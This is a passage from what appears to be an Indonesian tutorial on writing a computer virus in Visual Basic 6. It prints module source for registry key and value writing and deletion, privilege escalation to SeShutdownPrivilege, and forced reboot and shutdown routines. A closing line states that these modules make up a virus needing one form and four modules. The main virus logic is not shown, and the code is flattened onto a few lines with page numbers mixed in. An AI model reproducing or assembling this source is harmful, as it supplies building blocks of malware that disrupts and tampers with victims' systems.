1 'Get Windows Path Public Function GetWindowsPath() As String On Error Resume Next Dim Buffer As String * 255 Dim x As Long x = GetWindowsDirectory(Buffer, 255) GetWindowsPath = Left(Buffer, x) & "\" End Function Public Function Folder_Exist(ByVal strFolder As String) As Boolean Dim fso As Object Set fso = CreateObject("Scripting.FileSystemObject") If InStr(1, Right$(strFolder, 5), ".") > 0 Then strFolder = fso.GetParentFolderName(strFolder) End If If fso.FolderExists(strFolder) Then Folder_Exist = True Else Folder_Exist = False End If Set fso = Nothing End Function Module Racuni_Registry 'Registry API Public Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long Public Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value. Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Public Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long ' Note that if you declare the lpData parameter as String, you must pass it By Value. Public Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long Public Const REG_DWORD = 4 Enum REG - 14

1 HKEY_CURRENT_USER = &H80000001 HKEY_CLASSES_ROOT = &H80000000 HKEY_CURRENT_CONFIG = &H80000005 HKEY_LOCAL_MACHINE = &H80000002 HKEY_USERS = &H80000003 End Enum Enum TypeStringValue REG_SZ = 1 REG_EXPAND_SZ = 2 REG_MULTI_SZ = 7 End Enum 'Create or Set Dword Value Registry Public Function CreateDwordValue(hKey As REG, Subkey As String, strValueName As String, dwordData As Long) As Long On Error Resume Next Dim ret As Long RegCreateKey hKey, Subkey, ret CreateDwordValue = RegSetValueEx(ret, strValueName, 0, REG_DWORD, dwordData, 4) RegCloseKey ret End Function Public Function CreateStringValue(hKey As REG, Subkey As String, RTypeStringValue As TypeStringValue, strValueName As String, strData As String) As Long On Error Resume Next Dim ret As Long RegCreateKey hKey, Subkey, ret CreateStringValue = RegSetValueEx(ret, strValueName, 0, RTypeStringValue, ByVal strData, Len(strData)) RegCloseKey ret End Function Public Function DeleteValue(hKey As REG, Subkey As String, lpValName As String) As Long Dim ret As Long On Error Resume Next RegOpenKey hKey, Subkey, ret DeleteValue = RegDeleteValue(ret, lpValName) RegCloseKey ret End Function Module Restart Public Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long - 15

1 Public Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LUID) As Long Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long Public Declare Function GetCurrentProcess Lib "kernel32" () As Long Public Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long Public Const EWX_FORCE = 4 Public Const EWX_REBOOT = 2 Public Const EWX_SHUTDOWN = 1 Public Const VER_PLATFORM_WIN32_NT = 2 Public Const ANYSIZE_ARRAY = 1 Public Const TOKEN_ADJUST_PRIVILEGES = &H20 Public Const TOKEN_QUERY = &H8 Public Const SE_PRIVILEGE_ENABLED = &H2 Public Type LUID LowPart As Long HighPart As Long End Type Public Type LUID_AND_ATTRIBUTES pLuid As LUID Attributes As Long End Type Public Type TOKEN_PRIVILEGES PrivilegeCount As Long Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES End Type Public Type OSVERSIONINFO dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 End Type 'Reboot Windows(Not WinNT) Public Function Reboot() As Long 'On Error Resume Next LogOff = ExitWindowsEx(EWX_FORCE Or EWX_REBOOT, 0) End Function 'Shutdown Windows(Not WinNT) Public Function Shutdown() As Long - 16

1 'On Error Resume Next LogOff = ExitWindowsEx(EWX_FORCE Or EWX_SHUTDOWN, 0) End Function 'Detection WinNT Public Function IsWinNT() As Boolean 'On Error Resume Next Dim myOS As OSVERSIONINFO myOS.dwOSVersionInfoSize = Len(myOS) GetVersionEx myOS IsWinNT = (myOS.dwPlatformId = VER_PLATFORM_WIN32_NT) End Function 'For Get Privileges from Win NT Public Sub EnableShutDown() 'On Error Resume Next Dim hProc As Long Dim hToken As Long Dim mLUID As LUID Dim mPriv As TOKEN_PRIVILEGES Dim mNewPriv As TOKEN_PRIVILEGES hProc = GetCurrentProcess() OpenProcessToken hProc, TOKEN_ADJUST_PRIVILEGES + TOKEN_QUERY, hToken LookupPrivilegeValue "", "SeShutdownPrivilege", mLUID mPriv.PrivilegeCount = 1 mPriv.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED mPriv.Privileges(0).pLuid = mLUID 'Setting Privileges windows NT AdjustTokenPrivileges hToken, False, mPriv, 4 + (12 * mPriv.PrivilegeCount), mNewPriv, 4 + (12 * mNewPriv.PrivilegeCount) End Sub ' Reboot For WinNT Public Sub RebootNT(Force As Boolean) Dim Flags As Long Flags = EWX_REBOOT If Force Then Flags = Flags + EWX_FORCE If IsWinNT Then EnableShutDown ExitWindowsEx Flags, 0 End Sub ' Shutdown For WinNT Public Sub ShutdownNT(Force As Boolean) - 17

1 Dim Flags As Long Flags = EWX_SHUTDOWN If Force Then Flags = Flags + EWX_FORCE If IsWinNT Then EnableShutDown ExitWindowsEx Flags, 0 End Sub Untuk virus ni anda membutuhkan 1 form dan 4 Module. Untuk lebih jelasnya silahkan anda lihat coding berikut ini:

- 18